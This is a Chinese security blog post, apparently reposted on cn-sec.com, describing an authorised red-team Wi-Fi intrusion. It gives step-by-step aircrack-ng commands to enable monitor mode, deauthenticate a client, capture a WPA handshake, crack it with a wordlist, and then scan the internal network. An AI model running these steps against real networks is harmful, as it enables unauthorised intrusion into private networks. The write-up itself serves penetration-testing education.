记一次IOT设备支撑下的近源渗透

admin 2022年6月30日01:29:13记一次IOT设备支撑下的近源渗透已关闭评论190 views字数 2173阅读7分14秒阅读模式

前言

事情是这样的,为了今年GA部实现HW前的准备,我们实验室采购了一些"设备",这不正好接到某部单位的授权参加演习,于是有了下面的内容分享,不适地方已打码。请关注公众号"星海安全实验室"

一、设备的准备

我们对目标以及目标环境进行考察,选好地址架设设备,然后对其进行密码破解和钓鱼攻击。另外这里地址以及位置的话跟设备有关,我们在之前已经对天线的有效距离以及生效的信号强度做过实验,具体之前的实验数据在清单中获取。

记一次IOT设备支撑下的近源渗透

记一次IOT设备支撑下的近源渗透

二、WiFi密码破解攻击

WiFi密码破解攻击主要是利用Linux下的aircrack工具。由于我们连接了外置的无线网卡,这里首先要让虚拟机与无线网卡连接。

0x01 安装驱动

如果你购买的无线网卡是免驱的,那么恭喜你不用受到安装无线网卡驱动的折磨,如果不是免驱的,你就要先给它装上无线网卡的驱动了。安装驱动其实就是几条命令,根据你购买的网卡型号进行安装,这里我购买的网卡需要安装rtl88x2BU驱动:

apt update
apt install bc -y
git clone https://github.com/cilynx/rtl88x2BU_WiFi_linux_v5.3.1_27678.20180430_COEX20180427-5959.git
cd rtl88x2BU_WiFi_linux_v5.3.1_27678.20180430_COEX20180427-5959
VER=$(sed -n 's/\PACKAGE_VERSION="\(.*\)"/\1/p' dkms.conf)
sudo rsync -rvhP ./ /usr/src/rtl88x2bu-${VER}
sudo apt-get install dkms
sudo dkms add -m rtl88x2bu -v ${VER}
sudo dkms build -m rtl88x2bu -v ${VER}
sudo dkms install -m rtl88x2bu -v ${VER}
sudo modprobe 88x2bu

这里注意从github上下载的时候看一下最新的是多少,下载最新的。安装过程中如果遇到其他问题直接百度都能找到解决办法,唯独遇到头文件报错的问题是解决不了的,即使你自己下载头文件安装进去也不行,这里我最后找到的解决办法就是给kali装上官方源,然后用官方源更新你的kali,更新完之后再装就可以了。

0x02 接入无线网卡

主机USB接口直接插入无线网卡,Kali虚拟机弹窗提示,选择连接到虚拟机,选中Kali,点击确定。

记一次IOT设备支撑下的近源渗透

此时可以看到WiFi虽然显示无连接,但是已经可以搜索附近的WiFi了。

记一次IOT设备支撑下的近源渗透

记一次IOT设备支撑下的近源渗透

打开终端输入ifconfig查看网卡,存在wlan0。也说明网卡已经识别到了。

记一次IOT设备支撑下的近源渗透

然后,我们把设备拿起来,对准我们要进行密码破解的WiFi位置,准备进行攻击。

记一次IOT设备支撑下的近源渗透

0x03 正文开始

1、开启网卡监听模式,输入命令:

airmon-ng start wlan0

记一次IOT设备支撑下的近源渗透

2、查看是否监听成功:

iwconfig

wlan0变成了wlan0mon,监听成功。

记一次IOT设备支撑下的近源渗透

3、探测信号接收器接收到的WiFi:

airodump-ng wlan0mon

记一次IOT设备支撑下的近源渗透

主要看三个参数:

BSSID:路由器的MAC地址
PWR:信号值,绝对值越低,说明信号越强
CH:当前路由器使用的信道

4、选择WiFi并进行监听

找一个信号比较强的WIFI进行监听,这里选择了Meeting-01(看起来像是某部单位会议室的WiFi),BSSID为:90:76:9F:81:C8:9A,使用的信道为11,输入命令,开始监听:

airodump‐ng ‐‐bssid 90:76:9F:81:C8:9A ‐c 11 ‐w test wlan0mon

参数说明:
–bssid:路由器的MAC地址
-c:路由器使用的信道。(信道一定不要弄错)
-w:抓取的握手包名称,可以选择输出的路径,这里使用默认输出路径为根目录

记一次IOT设备支撑下的近源渗透

下面是连接此WiFi的用户信息,BSSID,STATION等都可以看到。

5、抓取握手包

这个终端不要关,我们任选一个用户进行攻击,使其断开与路由器的连接。(原理没有深究,大概是向目标发送大量数据,使设备与路由器断开连接,停止攻击后,设备会自动连接上路由器,此时就可以抓取到握手包。)

aireplay‐ng ‐0 10 ‐a 90:76:9F:81:C8:9A ‐c 42:C7:0A:57:0B:E4 wlan0mon

```
参数说明:

-0:指定对目标进行攻击的次数

-a:路由器的MAC地址

-c:目标MAC地址
```

记一次IOT设备支撑下的近源渗透

攻击完成后,此时在第一个终端会显示握手包抓取成功,如下图:

记一次IOT设备支撑下的近源渗透

然后在根目录会生成有一些握手包文件,其中包含test-01.cap。

6、在终端输入命令,开始进行密码爆破:

aircrack‐ng ‐w /usr/share/wordlists/rockyou.txt test‐01.cap

7、结果检验

记一次IOT设备支撑下的近源渗透

0x04 内网探测

成功连接到某部单位的WiFi,直接进内网。用Goby探测一下内网资产。

记一次IOT设备支撑下的近源渗透

记一次IOT设备支撑下的近源渗透

探测到存活IP若干,开放端口若干,而且有大量的指纹信息,又有的搞了。

总结

从互联网侧渗透进内网没有实质性进展时,不妨来试一试近源渗透,成功的话直接进内网,可以说令企业或者单位防不胜防。就本次来讲,比起到目标单位插U盘来说,这种方式我们渗透人员的人身安全也有保障,毕竟不会被抓包,也比钓鱼成功的概率也要高上许多。

详细设备清单以及内容说明请关注公众号,回复"清单"获取。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月30日01:29:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次IOT设备支撑下的近源渗透https://cn-sec.com/archives/1148863.html